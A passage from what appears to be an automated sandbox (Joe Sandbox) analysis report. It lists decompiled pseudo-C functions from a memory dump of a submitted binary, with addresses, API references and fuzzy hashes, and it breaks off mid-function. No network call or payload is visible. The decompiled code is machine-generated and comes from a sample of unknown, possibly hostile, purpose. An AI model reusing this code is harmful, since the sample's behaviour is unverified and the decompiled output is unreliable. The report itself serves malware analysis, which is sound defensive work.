                              									E0040C380(_t510 - 0x108, __eflags);
                              									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              									 *(_t510 - 4) = 0xd;
                              									E004042D6();
                              									 *(_t510 - 4) = 1;
                              									E004042AD(_t510 - 0x30);
                              									_t356 =  *(_t510 + 0x18);
                              									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              									__eflags = _t356;
                              									if(_t356 != 0) {
                              										 *((intOrPtr*)( *_t356 + 8))(_t356);
                              									}
                              									_t330 =  *(_t510 + 0xc);
                              									goto L92;
                              								}
                              							}
                              							 *(_t510 - 4) = 7;
                              							E00403800(_t510 - 0x14);
                              							 *(_t510 - 4) = 2;
                              							E0040C380(_t510 - 0x108, __eflags); // executed
                              							 *(_t510 - 4) = 1;
                              							E0040C435(_t510 - 0x30);
                              							_t144 = _t510 - 4;
                              							 *_t144 =  *(_t510 - 4) & 0x00000000;
                              							__eflags =  *_t144;
                              							E00403800(_t510 + 0x18);
                              							goto L36;
                              						}
                              						_t368 =  *(_t510 - 0x14);
                              						 *(_t510 - 4) = 7;
                              						__eflags = _t368 - _t407;
                              						if(__eflags != 0) {
                              							 *((intOrPtr*)( *_t368 + 8))(_t368);
                              						}
                              						 *(_t510 - 4) = 2;
                              						E0040C380(_t510 - 0x108, __eflags);
                              						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              						 *(_t510 - 4) = 0xa;
                              						E004042D6();
                              						 *(_t510 - 4) = 1;
                              						E004042AD(_t510 - 0x30);
                              						_t372 =  *(_t510 + 0x18);
                              						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              						__eflags = _t372 - _t407;
                              						if(_t372 != _t407) {
                              							 *((intOrPtr*)( *_t372 + 8))(_t372);
                              						}
                              						_t330 = _t489;
                              						goto L92;
                              					}
                              					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              					 *(_t510 - 4) = 6;
                              					E004042D6();
                              					 *(_t510 - 4) = 1;
                              					E004042AD(_t510 - 0x30);
                              					_t329 =  *(_t510 + 0x18);
                              					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              					__eflags = _t329 - _t407;
                              					goto L83;
                              				} else {
                              					_t401 =  *(_t510 + 0x18);
                              					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              					if(_t401 != _t407) {
                              						 *((intOrPtr*)( *_t401 + 8))(_t401);
                              					}
                              					L36:
                              					_t330 = 0;
                              					L92:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
                              					return _t330;
                              				}
                              			}
                              0x0040c17b
                              0x0040c180
                              0x0040c187
                              0x0040c18b
                              0x0040c18e
                              0x0040c196
                              0x0040c19a
                              0x0040c19f
                              0x0040c1a2
                              0x0040c1a6
                              0x0040c1a8
                              0x0040c1a8
                              0x0040c1ad
                              0x0040c1ad
                              0x0040c1b0
                              0x00000000
                              0x0040c1b0
                              0x0040c0f3
                              0x0040c0f6
                              0x0040c0fa
                              0x0040c0fc
                              0x0040c101
                              0x0040c101
                              0x0040c104
                              0x0040c107
                              0x0040c10b
                              0x0040c10d
                              0x0040c112
                              0x0040c112
                              0x0040c11b
                              0x0040c11f
                              0x0040c124
                              0x0040c12b
                              0x00000000
                              0x0040c12b
                              0x0040c0a4
                              0x0040c0a6
                              0x0040c0a9
                              0x0040c0ab
                              0x0040c0af
                              0x00000000
                              0x00000000
                              0x0040c0b5
                              0x0040c0b7
                              0x0040c0bc
                              0x0040c0bc
                              0x0040c0bf
                              0x0040c0c2
                              0x0040c0c6
                              0x0040c0c8
                              0x0040c0cd
                              0x0040c0cd
                              0x0040c0d6
                              0x0040c0da
                              0x0040c0df
                              0x0040c0e6
                              0x00000000
                              0x0040c0e6
                              0x0040c048
                              0x0040c04a
                              0x0040c04d
                              0x0040c04f
                              0x0040c053
                              0x00000000
                              0x00000000
                              0x0040c059
                              0x0040c05b
                              0x0040c060
                              0x0040c060
                              0x0040c063
                              0x0040c066
                              0x0040c06a
                              0x0040c06c
                              0x0040c071
                              0x0040c071
                              0x0040c07a
                              0x0040c07e
                              0x0040c083
                              0x0040c08a
                              0x00000000
                              0x0040c08a
                              0x0040bfb3
                              0x0040bfb6
                              0x0040bfba
                              0x0040bfbc
                              0x0040bfc5
                              0x0040bfc5
                              0x00000000
                              0x0040bf45
                              0x0040bf45
                              0x0040bf48
                              0x0040bf4c
                              0x0040bf4e
                              0x0040bf53
                              0x0040bf53
                              0x0040bf56
                              0x0040bf59
                              0x0040bf5d
                              0x0040bf5f
                              0x0040bf64
                              0x0040bf64
                              0x0040bf6d
                              0x0040bf71
                              0x0040bf76
                              0x0040bf80
                              0x0040bf84
                              0x0040bf8c
                              0x0040bf90
                              0x0040bf95
                              0x0040bf98
                              0x0040bf9c
                              0x0040bf9e
                              0x0040bfa3
                              0x0040bfa3
                              0x0040bfa6
                              0x00000000
                              0x0040bfa6
                              0x0040bf43
                              0x0040be7b
                              0x0040be7f
                              0x0040be8a
                              0x0040be8e
                              0x0040be96
                              0x0040be9a
                              0x0040be9f
                              0x0040be9f
                              0x0040be9f
                              0x0040bea6
                              0x00000000
                              0x0040bea6
                              0x0040be1c
                              0x0040be1f
                              0x0040be23
                              0x0040be25
                              0x0040be2a
                              0x0040be2a
                              0x0040be33
                              0x0040be37
                              0x0040be3c
                              0x0040be46
                              0x0040be4a
                              0x0040be52
                              0x0040be56
                              0x0040be5b
                              0x0040be5e
                              0x0040be62
                              0x0040be64
                              0x0040be69
                              0x0040be69
                              0x0040be6c
                              0x00000000
                              0x0040be6c
                              0x0040bd63
                              0x0040bd6d
                              0x0040bd71
                              0x0040bd79
                              0x0040bd7d
                              0x0040bd82
                              0x0040bd85
                              0x0040bd89
                              0x00000000
                              0x0040bc23
                              0x0040bc23
                              0x0040bc26
                              0x0040bc2c
                              0x0040bc35
                              0x0040bc35
                              0x0040beab
                              0x0040beab
                              0x0040c270
                              0x0040c275
                              0x0040c27e
                              0x0040c27e

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                              • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0040280D() {
                              				void* __ebx;
                              				intOrPtr* _t185;
                              				intOrPtr* _t186;
                              				signed int _t187;
                              				signed int _t195;
                              				intOrPtr* _t196;
                              				signed int _t197;
                              				intOrPtr _t198;
                              				intOrPtr* _t199;
                              				intOrPtr* _t204;
                              				intOrPtr* _t207;
                              				signed int _t208;
                              				signed int _t209;
                              				FILETIME* _t217;
                              				signed int _t226;
                              				signed int _t227;
                              				FILETIME* _t228;
                              				FILETIME* _t244;
                              				signed int _t270;
                              				intOrPtr _t289;
                              				WCHAR* _t315;
                              				signed int _t338;
                              				signed int _t340;
                              				signed int _t342;
                              				intOrPtr _t344;
                              				intOrPtr* _t346;
                              				signed int _t347;
                              				void* _t348;
                              
                              				E00413954(E0041921B, _t348);
                              				_t344 =  *((intOrPtr*)(_t348 + 8));
                              				if(E00402D80(_t344 + 0xa8) == 0) {
                              					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
                              					_t270 = 0;
                              					__eflags = _t185;
                              					if(_t185 != 0) {
                              						 *((intOrPtr*)( *_t185 + 8))(_t185);
                              						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
                              					}
                              					 *(_t348 - 0x58) = _t270;
                              					 *(_t348 - 0x56) = _t270;
                              					_t186 =  *((intOrPtr*)(_t344 + 0xc));
                              					_t338 =  *(_t348 + 0xc);
                              					 *(_t348 - 4) = _t270;
                              					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
                              					__eflags = _t187 - _t270;
                              					if(_t187 == _t270) {
                              						 *(_t348 - 0x18) = _t270;
                              						 *(_t348 - 0x14) = _t270;
                              						 *(_t348 - 0x10) = _t270;
                              						E00402170(_t348 - 0x18, 3);
                              						__eflags =  *(_t348 - 0x58) - _t270;
                              						 *(_t348 - 4) = 1;
                              						if( *(_t348 - 0x58) != _t270) {
                              							__eflags =  *(_t348 - 0x58) - 8;
                              							if( *(_t348 - 0x58) == 8) {
                              								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
                              								L12:
                              								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
                              								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
                              								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
                              									 *( *(_t348 + 0x10)) = _t270;
                              									L61:
                              									E00403A9C( *(_t348 - 0x18));
                              									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              									E00405E34(_t348 - 0x58);
                              									_t195 = 0;
                              									__eflags = 0;
                              									goto L62;
                              								}
                              								 *(_t348 - 0x28) = _t270;
                              								 *(_t348 - 0x26) = _t270;
                              								_t196 =  *((intOrPtr*)(_t344 + 0xc));
                              								 *(_t348 - 4) = 2;
                              								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
                              								__eflags = _t197 - _t270;
                              								if(_t197 == _t270) {
                              									__eflags =  *(_t348 - 0x28) - _t270;
                              									if( *(_t348 - 0x28) != _t270) {
                              										__eflags =  *(_t348 - 0x28) - 0x13;
                              										if( *(_t348 - 0x28) == 0x13) {
                              											_t198 =  *((intOrPtr*)(_t348 - 0x20));
                              											L20:
                              											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
                              											_t199 =  *((intOrPtr*)(_t344 + 0xc));
                              											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
                              											__eflags = _t197 - _t270;
                              											if(_t197 != _t270) {
                              												goto L14;
                              											}
                              											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
                              											 *(_t348 + 0xb) = _t270;
                              											 *(_t348 - 0x74) = _t270;
                              											 *(_t348 - 0x72) = _t270;
                              											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
                              											_t204 =  *((intOrPtr*)(_t344 + 0xc));
                              											 *(_t348 - 4) = 3;
                              											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
                              											__eflags = _t340 - _t270;
                              											if(_t340 == _t270) {
                              												__eflags =  *(_t348 - 0x74) - 0xb;
                              												if( *(_t348 - 0x74) == 0xb) {
                              													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
                              													_t66 = _t348 + 0xb;
                              													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
                              													__eflags =  *_t66;
                              												}
                              												 *(_t348 - 4) = 2;
                              												E00405E34(_t348 - 0x74);
                              												_t207 =  *((intOrPtr*)(_t344 + 0xc));
                              												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
                              												__eflags = _t197 - _t270;
                              												if(_t197 != _t270) {
                              													goto L14;
                              												} else {
                              													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
                              													__eflags = _t208 - _t270;
                              													if(_t208 == _t270) {
                              														_t209 = _t344 + 0x38;
                              														 *(_t348 + 0xc) = _t209;
                              														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
                              														_t289 =  *((intOrPtr*)(_t344 + 0x60));
                              														L30:
                              														 *((intOrPtr*)(_t209 + 4)) = _t289;
                              														E00402155(_t348 - 0x3c);
                              														_t341 = 0x41b370;
                              														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              														 *(_t348 - 4) = 4;
                              														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
                              														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                              														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                              															E00401CE1(_t348 - 0x64, _t348 - 0x18);
                              															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                              															 *(_t348 - 4) = 6;
                              															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                              																E004042DE(_t348 - 0x3c);
                              															}
                              															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                              															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                              																__eflags =  *(_t348 + 0xb) - _t270;
                              																if( *(_t348 + 0xb) == _t270) {
                              																	_push(_t348 - 0x3c); // executed
                              																	E004027A6(_t344); // executed
                              																}
                              															}
                              															_t335 = _t344 + 0x10;
                              															_push(_t348 - 0x64);
                              															E00402634(_t348 - 0x48, _t344 + 0x10);
                              															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                              															 *(_t348 - 4) = 7;
                              															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                              																E00402EE1(_t348 - 0x84);
                              																_push( *((intOrPtr*)(_t348 - 0x48)));
                              																 *(_t348 - 4) = 9;
                              																_t217 = E00405841(_t348 - 0xac, _t335); // executed
                              																__eflags = _t217;
                              																if(_t217 == 0) {
                              																	L48:
                              																	__eflags =  *(_t348 + 0xb) - _t270;
                              																	if( *(_t348 + 0xb) != _t270) {
                              																		L59:
                              																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																		 *(_t348 - 4) = 0xd;
                              																		E004042D6();
                              																		 *(_t348 - 4) = 2;
                              																		E004042AD(_t348 - 0x3c);
                              																		 *(_t348 - 4) = 1;
                              																		E00405E34(_t348 - 0x28);
                              																		goto L61;
                              																	}
                              																	_push(0x18);
                              																	_t226 = E00403A76();
                              																	__eflags = _t226 - _t270;
                              																	if(_t226 == _t270) {
                              																		_t342 = 0;
                              																		__eflags = 0;
                              																	} else {
                              																		 *(_t226 + 4) = _t270;
                              																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
                              																		 *_t226 = 0x41b354;
                              																		_t342 = _t226;
                              																	}
                              																	__eflags = _t342 - _t270;
                              																	 *(_t344 + 0x48) = _t342;
                              																	 *(_t348 + 0xc) = _t342;
                              																	if(_t342 != _t270) {
                              																		 *((intOrPtr*)( *_t342 + 4))(_t342);
                              																	}
                              																	_t227 =  *(_t344 + 0x48);
                              																	 *(_t227 + 0x10) = _t270;
                              																	 *(_t348 - 4) = 0xb;
                              																	 *(_t227 + 0x14) = _t270;
                              																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
                              																	__eflags = _t228;
                              																	if(_t228 != 0) {
                              																		E0040640D(_t344 + 0x4c, _t342);
                              																		 *(_t348 - 4) = 9;
                              																		 *( *(_t348 + 0x10)) = _t342;
                              																		_t341 = 0x41b370;
                              																		goto L59;
                              																	} else {
                              																		E00401D1B(_t344 + 0xe4,  *0x420280);
                              																		__eflags = _t342 - _t270;
                              																		 *(_t348 - 4) = 9;
                              																		if(_t342 != _t270) {
                              																			 *((intOrPtr*)( *_t342 + 8))(_t342);
                              																		}
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              																		 *(_t348 - 4) = 0xc;
                              																		E004042D6();
                              																		 *(_t348 - 4) = 2;
                              																		E004042AD(_t348 - 0x3c);
                              																		 *(_t348 - 4) = 1;
                              																		E00405E34(_t348 - 0x28);
                              																		E00403A9C( *(_t348 - 0x18));
                              																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              																		E00405E34(_t348 - 0x58);
                              																		_t195 = 0x80004005;
                              																		goto L62;
                              																	}
                              																}
                              																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
                              																__eflags = _t244;
                              																if(_t244 != 0) {
                              																	goto L48;
                              																}
                              																E00401D1B(_t344 + 0xe4,  *0x42027c);
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																 *(_t348 - 4) = 0xa;
                              																L45:
                              																_t270 = 0x80004005;
                              																goto L46;
                              															} else {
                              																_t346 = _t344 + 0x28;
                              																E00401D7A(_t346, _t348 - 0x48);
                              																__eflags =  *(_t348 + 0xb) - _t270;
                              																_t315 =  *_t346;
                              																if( *(_t348 + 0xb) == _t270) {
                              																	__eflags = 0;
                              																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
                              																} else {
                              																	E0040494E(_t315);
                              																}
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																 *(_t348 - 4) = 8;
                              																L46:
                              																E004042D6();
                              																 *(_t348 - 4) = 2;
                              																E004042AD(_t348 - 0x3c);
                              																L47:
                              																 *(_t348 - 4) = 1;
                              																E00405E34(_t348 - 0x28);
                              																E00403A9C( *(_t348 - 0x18));
                              																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              																E00405E34(_t348 - 0x58);
                              																_t195 = _t270;
                              																goto L62;
                              															}
                              														}
                              														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              														 *(_t348 - 4) = 5;
                              														goto L45;
                              													}
                              													__eflags = _t208 - 0x40;
                              													if(_t208 != 0x40) {
                              														goto L18;
                              													}
                              													_t209 = _t344 + 0x38;
                              													 *(_t348 + 0xc) = _t209;
                              													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
                              													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
                              													goto L30;
                              												}
                              											}
                              											 *(_t348 - 4) = 2;
                              											E00405E34(_t348 - 0x74);
                              											 *(_t348 - 4) = 1;
                              											E00405E34(_t348 - 0x28);
                              											E00403A9C( *(_t348 - 0x18));
                              											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              											E00405E34(_t348 - 0x58);
                              											_t195 = _t340;
                              											goto L62;
                              										}
                              										L18:
                              										_t270 = 0x80004005;
                              										goto L47;
                              									}
                              									_t198 =  *((intOrPtr*)(_t344 + 0x64));
                              									goto L20;
                              								}
                              								L14:
                              								_t270 = _t197;
                              								goto L47;
                              							}
                              							E00403A9C( *(_t348 - 0x18));
                              							_t347 = 0x80004005;
                              							goto L10;
                              						}
                              						E00401D7A(_t348 - 0x18, _t344 + 0x50);
                              						goto L12;
                              					} else {
                              						_t347 = _t187;
                              						L10:
                              						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              						E00405E34(_t348 - 0x58);
                              						_t195 = _t347;
                              						L62:
                              						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
                              						return _t195;
                              					}
                              				}
                              				_t195 = 0x80004004;
                              				goto L62;
                              			}

                              0x00402812
                              0x0040281f
                              0x00402830
                              0x0040283c
                              0x0040283f
                              0x00402841
                              0x00402843
                              0x00402848
                              0x0040284b
                              0x0040284b
                              0x0040284e
                              0x00402852
                              0x00402856
                              0x00402859
                              0x0040285f
                              0x00402869
                              0x0040286c
                              0x0040286e
                              0x00402879
                              0x0040287c
                              0x0040287f
                              0x00402882
                              0x00402887
                              0x0040288b
                              0x0040288f
                              0x0040289f
                              0x004028a4
                              0x004028cd
                              0x004028d2
                              0x004028d9
                              0x004028de
                              0x004028e1
                              0x00402cc1
                              0x00402cc3
                              0x00402cc6
                              0x00402ccb
                              0x00402cd3
                              0x00402cd8
                              0x00402cd8
                              0x00000000
                              0x00402cd8
                              0x004028e7
                              0x004028eb
                              0x004028ef
                              0x004028fc
                              0x00402900
                              0x00402903
                              0x00402905
                              0x0040290e
                              0x00402912
                              0x00402919
                              0x0040291e
                              0x0040292a
                              0x0040292d
                              0x0040292d
                              0x00402930
                              0x0040293d
                              0x00402940
                              0x00402942
                              0x00000000
                              0x00000000
                              0x00402944
                              0x00402948
                              0x0040294b
                              0x0040294f
                              0x00402956
                              0x00402959
                              0x00402966
                              0x0040296d
                              0x0040296f
                              0x00402971
                              0x004029a7
                              0x004029ac
                              0x004029ae
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b9
                              0x004029bd
                              0x004029c2
                              0x004029d1
                              0x004029d4
                              0x004029d6
                              0x00000000
                              0x004029dc
                              0x004029dc
                              0x004029e0
                              0x004029e2
                              0x00402a00
                              0x00402a03
                              0x00402a06
                              0x00402a08
                              0x00402a0b
                              0x00402a0b
                              0x00402a11
                              0x00402a16
                              0x00402a1b
                              0x00402a24
                              0x00402a28
                              0x00402a2d
                              0x00402a30
                              0x00402a45
                              0x00402a4a
                              0x00402a4d
                              0x00402a51
                              0x00402a56
                              0x00402a56
                              0x00402a5b
                              0x00402a5e
                              0x00402a60
                              0x00402a63
                              0x00402a6a
                              0x00402a6b
                              0x00402a6b
                              0x00402a63
                              0x00402a73
                              0x00402a76
                              0x00402a7a
                              0x00402a7f
                              0x00402a82
                              0x00402a86
                              0x00402ad0
                              0x00402ad5
                              0x00402ade
                              0x00402ae2
                              0x00402ae7
                              0x00402ae9
                              0x00402b72
                              0x00402b72
                              0x00402b75
                              0x00402c6b
                              0x00402c72
                              0x00402c7d
                              0x00402c85
                              0x00402c8d
                              0x00402c95
                              0x00402c9b
                              0x00402c9f
                              0x00402ca7
                              0x00402cab
                              0x00402cb3
                              0x00402cb7
                              0x00000000
                              0x00402cb7
                              0x00402b7b
                              0x00402b7d
                              0x00402b82
                              0x00402b85
                              0x00402b98
                              0x00402b98
                              0x00402b87
                              0x00402b87
                              0x00402b8a
                              0x00402b8e
                              0x00402b94
                              0x00402b94
                              0x00402b9a
                              0x00402b9c
                              0x00402b9f
                              0x00402ba2
                              0x00402ba7
                              0x00402ba7
                              0x00402bad
                              0x00402bb3
                              0x00402bb9
                              0x00402bbd
                              0x00402bc0
                              0x00402bc5
                              0x00402bc7
                              0x00402c58
                              0x00402c60
                              0x00402c64
                              0x00402c66
                              0x00000000
                              0x00402bcd
                              0x00402bd9
                              0x00402bde
                              0x00402be0
                              0x00402be4
                              0x00402be9
                              0x00402be9
                              0x00402bf2
                              0x00402bfa
                              0x00402c02
                              0x00402c0a
                              0x00402c14
                              0x00402c18
                              0x00402c20
                              0x00402c24
                              0x00402c2c
                              0x00402c30
                              0x00402c38
                              0x00402c3d
                              0x00402c45
                              0x00402c4a
                              0x00000000
                              0x00402c4a
                              0x00402bc7
                              0x00402af2
                              0x00402af7
                              0x00402af9
                              0x00000000
                              0x00000000
                              0x00402b07
                              0x00402b12
                              0x00402b1a
                              0x00402b22
                              0x00402b2a
                              0x00402b2d
                              0x00402b31
                              0x00402b31
                              0x00000000
                              0x00402a88
                              0x00402a88
                              0x00402a91
                              0x00402a96
                              0x00402a99
                              0x00402a9b
                              0x00402aa7
                              0x00402aaa
                              0x00402a9d
                              0x00402a9d
                              0x00402a9d
                              0x00402ab2
                              0x00402aba
                              0x00402ac0
                              0x00402ac4
                              0x00402b36
                              0x00402b39
                              0x00402b41
                              0x00402b45
                              0x00402b4a
                              0x00402b4d
                              0x00402b51
                              0x00402b59
                              0x00402b5e
                              0x00402b66
                              0x00402b6b
                              0x00000000
                              0x00402b6b
                              0x00402a86
                              0x00402a32
                              0x00402a35
                              0x00000000
                              0x00402a35
                              0x004029e4
                              0x004029e7
                              0x00000000
                              0x00000000
                              0x004029f0
                              0x004029f3
                              0x004029f6
                              0x004029f8
                              0x00000000
                              0x004029f8
                              0x004029d6
                              0x00402976
                              0x0040297a
                              0x00402982
                              0x00402986
                              0x0040298e
                              0x00402993
                              0x0040299b
                              0x004029a0
                              0x00000000
                              0x004029a0
                              0x00402920
                              0x00402920
                              0x00000000
                              0x00402920
                              0x00402914
                              0x00000000
                              0x00402914
                              0x00402907
                              0x00402907
                              0x00000000
                              0x00402907
                              0x004028a9
                              0x004028af
                              0x00000000
                              0x004028af
                              0x00402898
                              0x00000000
                              0x00402870
                              0x00402870
                              0x004028b4
                              0x004028b4
                              0x004028bb
                              0x004028c0
                              0x00402cda
                              0x00402ce0
                              0x00402ce8
                              0x00402ce8
                              0x0040286e
                              0x00402832
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402812
                                • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                              • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E00408A3B(intOrPtr __ecx) {
                              				intOrPtr _t181;
                              				signed int _t184;
                              				signed int* _t187;
                              				intOrPtr _t188;
                              				signed int* _t191;
                              				signed int* _t193;
                              				void* _t194;
                              				signed int* _t195;
                              				void* _t197;
                              				signed int* _t198;
                              				void* _t200;
                              				signed int* _t201;
                              				intOrPtr _t205;
                              				signed int* _t207;
                              				signed int* _t208;
                              				signed int* _t209;
                              				intOrPtr* _t213;
                              				intOrPtr* _t215;
                              				intOrPtr _t216;
                              				intOrPtr* _t217;
                              				intOrPtr* _t220;
                              				signed int* _t222;
                              				signed int* _t223;
                              				signed int* _t224;
                              				intOrPtr* _t232;
                              				signed int* _t234;
                              				signed int* _t235;
                              				signed int* _t236;
                              				intOrPtr* _t243;
                              				signed int* _t245;
                              				signed int* _t246;
                              				signed int* _t247;
                              				intOrPtr _t255;
                              				signed int _t266;
                              				signed int _t307;
                              				signed int _t313;
                              				intOrPtr _t317;
                              				signed int** _t319;
                              				intOrPtr _t320;
                              				void* _t322;
                              
                              				E00413954(E00419B47, _t322);
                              				_push(_t313);
                              				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
                              				E00408A27(__ecx);
                              				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
                              					while(1) {
                              						_t317 =  *((intOrPtr*)(_t322 + 0xc));
                              						_t307 = 1;
                              						_t313 = _t313 | 0xffffffff;
                              						_t181 =  *((intOrPtr*)(_t317 + 8));
                              						 *(_t322 - 0x24) = _t313;
                              						if(_t181 < _t307) {
                              							goto L6;
                              						}
                              						L4:
                              						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                              						if(_t266 >= _t181) {
                              							L76:
                              							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
                              							_t184 = 0;
                              							goto L77;
                              						}
                              						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
                              						L7:
                              						if(_t266 != 0) {
